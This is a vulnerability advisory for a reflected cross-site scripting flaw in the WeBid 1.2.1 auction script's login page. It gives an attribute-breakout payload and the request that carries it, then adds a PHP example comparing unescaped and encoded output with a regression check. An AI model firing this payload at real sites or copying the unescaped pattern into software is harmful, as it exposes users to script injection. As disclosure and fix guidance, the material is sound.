####################################################################
# Exploit Title : WeBid 1.2.1 XSS Vulnerability
# Author [ Discovered By ] : Mehmet EMİROĞLU
# Date : 07/02/2019
# Vendor Homepage : http://www.webidsupport.com/index.php
# Software Download Link : https://sourceforge.net/projects/simpleauction/
# Affected Versions : 1.2.1
# Tested On : Wampp, Windows, Lampp
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
# Software Description : Open source PHP/MySQL fully featured auction script.
Perfect for those who want to start their own auction site.
####################################################################
# Impact :
*********
# The affected web application is WeBid, version 1.2.1.
# Proof: see the screenshot linked below.
# https://i.hizliresim.com/r55qZP.jpg
####################################################################
# PoC :
****************************
# XSS Code : " onmouseover="alert(1007175)
# Post Request : http://localhost/[PATH]/user_login.php^csrftoken=&password=2829008&username=2871992" onmouseover="alert(1007175)
####################################################################
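Added example, not part of the original advisory and not WeBid source code: the PoC value breaks out of a double-quoted HTML attribute, so the fix is to encode the value for that context. The function names are hypothetical, and the example assumes the username is reflected into an input's value attribute, which the payload shape implies but the advisory does not show.

```php
<?php
// Illustration only: function names are hypothetical, not taken from WeBid.

// Vulnerable pattern: request value placed in a double-quoted attribute as-is.
function render_username_field_unsafe(string $username): string
{
    return '<input type="text" name="username" value="' . $username . '">';
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES encodes
// both " and ', so the value can no longer terminate the attribute.
function render_username_field_safe(string $username): string
{
    $encoded = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="username" value="' . $encoded . '">';
}

// Regression check: parse the markup and list the attributes the browser
// would see on the <input>. An event-handler attribute means the value escaped.
function input_attributes(string $html): array
{
    $doc = new DOMDocument();
    @$doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);
    $input = $doc->getElementsByTagName('input')->item(0);
    $names = [];
    foreach ($input->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Username value from the PoC request above.
$value = '2871992" onmouseover="alert(1007175)';

$renderers = [
    'unsafe' => 'render_username_field_unsafe',
    'safe'   => 'render_username_field_safe',
];
foreach ($renderers as $label => $fn) {
    $html  = $fn($value);
    $attrs = input_attributes($html);
    $state = in_array('onmouseover', $attrs, true) ? 'handler injected' : 'value contained';
    printf("%-6s %s\n       attributes: %s (%s)\n", $label, $html, implode(', ', $attrs), $state);
}
```

The same attribute check can be run against a patched user_login.php response to confirm that the reflected username stays inside the value attribute.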